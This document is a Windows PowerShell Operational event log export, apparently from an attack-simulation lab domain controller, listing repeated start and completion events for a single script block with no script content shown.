OpCode=On create calls
RecordNumber=1475442
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475441
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475440
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475439
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475438
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475437
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475436
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475435
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475434
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475433
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475432
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475431
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475430
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475429
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475428
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475427
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475426
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475425
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475424
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475423
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475422
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475421
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475420
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475419
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475418
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475417
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475416
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475415
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475414
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475413
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475412
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475411
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475410
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475409
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475408
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475407
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475406
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475405
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475404
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475403
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475402
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475401
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475400
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475399
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475398
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475397
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475396
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475395
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475394
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475393
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475392
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475391
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475390
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475389
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475388
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
